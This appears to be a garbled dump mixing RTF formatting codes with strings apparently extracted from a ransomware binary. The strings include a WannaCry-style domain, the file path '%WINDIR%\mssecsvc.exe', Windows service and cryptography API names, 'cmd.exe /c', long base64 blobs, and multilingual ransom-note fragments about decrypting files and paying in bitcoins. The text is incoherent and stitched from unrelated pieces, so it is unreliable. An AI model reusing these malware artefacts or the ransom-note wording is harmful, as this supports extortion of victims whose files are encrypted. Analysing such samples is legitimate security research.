\\Sessions\\1\\Windows\\ApiPort \\snext0 \\sqformat \\spriority0 \\styrsid1847526 Normal;}{\\*\\cs10 \\additive \\ssemihidden \\sunhideused \\spriority1 Default Paragraph Font;}{\\* \\snext11 \\ssemihidden \\sunhideused \\sqformat Normal Table;}{\\s15\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af41\\afs21\\alang1025 \\ltrch\\fcs0 \\ThemeApiPort \\ts11\\tsrowd\\trftsWidthB3\\trpaddl108\\trpaddr108\\trpaddfl3\\trpaddft3\\trpaddfb3\\trpaddfr3\\trcbpat1\\trcfpat1\\tblind0\\tblindtype3\\tscellwidthfts0\\tsvertalt\\tsbrdrt\\tsbrdrl\\tsbrdrb\\tsbrdrr\\tsbrdrdgl\\tsbrdrdgr\\tsbrdrh\\tsbrdrv \\ql \\li0\\ri0\\sa200\\sl276\\slmult1 -27273\\'92\\'b7}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 -28558\\'e7\\'ad}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 -32515\\'94\\'5c\ \\af36\\afs22 \\ltrch\\fcs0 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\line }{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 19981\\'95\\'73\ \\af36\\afs22 \\ltrch\\fcs0 19981\\'a4\\'a3\ 20063\\'a4\\'5d\ \\af90\\afs22 \\ltrch\\fcs0 20102\\'a4\\'46\ 20123\\'8d\\'b1\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af12\\afs22 20214\\'8c\\'8f\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 20493\\'ad\\'bf\ \\af90\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 21069\\'91\\'4f}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\cf6\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 21209\\'96\\'b1}{\\rtlch\\fcs1 \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 23433\\'a6\\'77\ \\af90\\afs22 \\ltrch\\fcs0 23494\\'96\\'a7\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 23565\\'9b\\'94}{\\rtlch\\fcs1 \\af11\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 c1\ 24163\\'95\\'bc}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af12\\afs22 \\ltrch\\fcs0 24489\\'95\\'9c\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 25214\\'a7\\'e4\ 25991\\'a4\\'e5\ \\af53\\afs22 \\ltrch\\fcs0 \\b\\fs28\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 26377\\'97\\'4c\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 27454\\'8a\\'bc\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 -244\\'81\\'43}{ 27602\\'93\\'c5\ \\af41\\afs22 \\ltrch\\fcs0 \\fs22\\cf6\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 32763\\'96\\'7c\ \\af36\\afs22 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1028\\loch\\af11\\hich\\af11\\dbch\\af11\\langfenp1028\\insrsid1060393\\charrsid1060393 \\loch\\af11\\hich\\af11\\dbch\\f11 12290\\'81\\'42}{\\rtlch\\fcs1 \\af41\\afs22 \\ltrch\\fcs0 c1\ \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 c1\ \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\hich\\af18\\dbch\\af18\\loch\\f18 }{\\rtlch\\fcs1 \\af90\\afs22 \\ltrch\\fcs0 c1\ \\af90\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 \\hich\\af18\\dbch\\af18\\loch\\f18 }{\\rtlch\\fcs1 c1\ \\af41\\afs22 c1\ c1\ \\af2 \\ltrch\\fcs0 \\b\\f31502\\fs28\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 iere\\hich\\af31502\\dbch\\af31505\\loch\\f31502 le mele? c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 ierele, dar nu pierde}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n ngay c}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 n \\'f0}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 c1\ \\af2 \\ltrch\\fcs0 \\f31528\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31528\\dbch\\af31505\\loch\\f31528 \\hich\\f31528 i gian, cho \\'f0}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 a b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c2\ \\af90\\afs22 \\ltrch\\fcs0 c2\ \\af53\\afs22 \\ltrch\\fcs0 \\fs22\\loch\\af18\\hich\\af18\\dbch\\af18\\insrsid4986254\\charrsid8656048 c2\ c2\ \\af90\\afs22 \\ltrch\\fcs0 c2\ seltbaln\\alntblind\\lytcalctblwd\\lyttblrtgr\\lnbrkrule\\nobrkwrptbl\\snaptogridincell\\allowfieldendsel\\wrppunct\\asianbrkrule \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af0\\afs22\\alang1025 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1042\\loch\\f31506\\hich\\af31506\\dbch\\af31505\\cgrid\\langnp1033\\langfenp1042 \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af31507\\afs22\\alang1025 \\ltrch\\fcs0 \\fs22\\lang1033\\langfe1042\\loch\\f31506\\hich\\af31506\\dbch\\af31505\\cgrid\\langnp1033\\langfenp1042 \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 }\\noqfpromote {\\stylesheet{\\ql \\li0\\ri0\\sa200\\sl276\\slmult1\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af31507\\afs22\\alang1025 \\widowctrl\\ftnbj\\aenddoc\\trackmoves1\\trackformatting1\\donotembedsysfont1\\relyonvml0\\donotembedlingdata0\\grfdocevents0\\validatexml1\\showplaceholdtext0\\ignoremixedcontent0\\saveinvalidxml0\\showxmlerrors1\\noxlattoyen \\Windows\\ApiPort ]M(y /.8$ ]PC(r(t)t __cfduidd601df8d69eccd96df5a5e5fc812588201527694466iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/92167001653763074226925032040030668850* __cfduidda10305ee2446276c19f4d5c76c652efe1527694462iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/921666016537630742269314450644630668849* __CxxFrameHandler __getmainargs __p__commode _acmdln _local_unwind2 a ch}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\cf6\\insrsid14315351\\charrsid3475210 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 A_A^A]A\\][^_ A_A^A]A\\^_][ AddressFamily ar a descriptografar seus arquivos imediatamente. attrib.exe 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 bitcoins>. buffer error BypassHTTPNoCacheCheck %WINDIR%\\mssecsvc.exe CacheAllCompartments Ce sa \\'ee\\loch\\f31502 \\hich\\f31502 nt\\'e2\\loch\\f31502 mplat cu calculatorul meu? ChangeServiceConfig2A chercher un moyen de r\\'e9\\loch\\f31502 \\hich\\f31502 cup\\'e9\\loch\\f31502 \\hich\\f31502 rer vos fichiers, mais ne perdez pas votre temps. Personne ne peut r\\'e9\\loch\\f31502 \\hich\\f31502 cup\\'e9\\loch\\f31502 \\hich\\f31502 CloseServiceHandle cmd.exe /c ""%s"" Co si\\'ea\\loch\\f31528 \\hich\\f31528 zdarzy\\'b3\\loch\\f31528 o z moim komputerem? colH+ogjOOxAuoh2o+bFGQ0MZ3NVnGSlZn4wrHF6rkLqTXWH1oyt7ZFsCWV+EskFhRWbyM96a0THCcdSkLISfZXHYKkzKcgELIMM8qVBqXl8Ni2yxemE2n8zQuXsUir6z0gAKL+6dRkMcdAUt9Q+g+ygmMHxSl7Nxl/KJfGTBd8uBCY+8VB58e21lL8bLe0Go9kfDJCJ/FkZJGkVgK5F4eZX/zERhD2CyDNBrgirjwCeKgFcGDttFqudl5tXmPvJh7RQJsZ/wFX9y28zvzY/rBKNi3Mrxgsjf2p7r0pCJMOaEL+mOdlPlbLWrpY5HNwTgEtw0rV3ARznLMA9AaxJKwF3nlRi3is3k6EaWnnfQmkVI6/vJk8fZNs005MECGxLZohesLAh4eGp9F+BCg3PB4Xkmhsd5Dfj9mVz+lRw3gjEC88kX9tpxDXr8SUAw9hnBmjUrshletxdp9HC0nUiXx6rzZ54vsswauif+d89YgO1hEtsbfOP9COW58OYiqkunK012HsHOjoPyd4T2t9wKhMNDB/YX0e/ks/T4YBOhjoy/r3fDSBSIfgR5+kT6KD24XiwvrlrUP5FJN58Y2kWYbINeNDIydOipJr8Vu5fh8byKy34IbvWxzF0k4bAyWuIjebXi Com+Enabled com/office/word/2003/wordml}}\\paperw12240\\paperh15840\\margl1501\\margr1502\\margt1701\\margb1440\\gutter0\\ltrsect CombineFalseStartData CommercialDataOptIn CompanyName CompatDll ComputerName CorExitProcess CreateProcessA CreateServiceA CryptDestroyKey CryptGenKey CryptImportKey D/DXw05uM3nsKZBSrFpwHeVpMmti7+YU8twUxi/fmETh29EoL5zY+hbjAfOhm7hi5Rx2pvGAqquVaFJmRwAIT3by2C9Wxr+nF6B/GvQVstWcvFtl4fODivFcF9UleKLaZrjGi1Vb3LPBVq7I3/PkvGvqiGVbUvij5UE9KbOFH/J/t+l+m6Sj6gyKn6HBgoDLjXfLpHryGK79wEkn/iR6+uL0JwRhihfRQsS5sFe193tX4Tf3r/9Sk6zSLA6AvMUsqU2ndylrj98y2jv1hNBQFIeWeqiomegyny4p6a5bOXVkPo5jvaZzwyTREVVbzvsq16mYPCn00euJ+E8I1OgCnKJ0Ycjipny8TwX6tJ2QvUROtiL+UNkiK847XVv2IQmo7eluLJALJxOnOx09qDvH7ma6Qrc3hI9gm/v+KwVvSSNizjrvPezj/hSaESPbMA8cDFLCiHK3+8Re7QcNdIwruULbvNMYHReW4ik827va2X1tPG5Q4M45z83Viz1HQRU+W/1MLFiunllzvUDqZfdMHpd8XzhbFGLLFQdyiTBJKnQW9QohiJIL2/0wNufrJppomx4hmRpjU+eiJCYoMHENCyLuE5oA6Uc6gORTQiz3Np5Pg6dvV9GX+QydQgSwRWrER7voykEBzV9Gh+zgU9ojACqCuSNvhZYt5ZzVQh/erePCYnH16wvWRTIQEClK8mXKSNAeJL6yWuRpcb1TbyWpw/OZGpWCTeeerYwHdgvxJgF8PGGilDTjtBJObZSAvq9rWdE8C03LC/wp92WIlt6e4RhiwtPC7UgQ+iV4g0sTXIjn71VGijhiWenZNw36R0dZPm0t8uHTMdq/Lrc0Ph+omA4T1LAz21vCMy+MKJBXO2ThykAozvOGs6JCtt40KA1iF8xMS3rZPwUwPsGHH3BkkdE9sCzggb7tkO3uWnoWgv9h92qU1TPNTI24xd7AMpliVrZcAUxL9HmystQHKXx2Jr1LaLXnRrMZs/USmneQd/k8f1rAK6VqKwRsNaec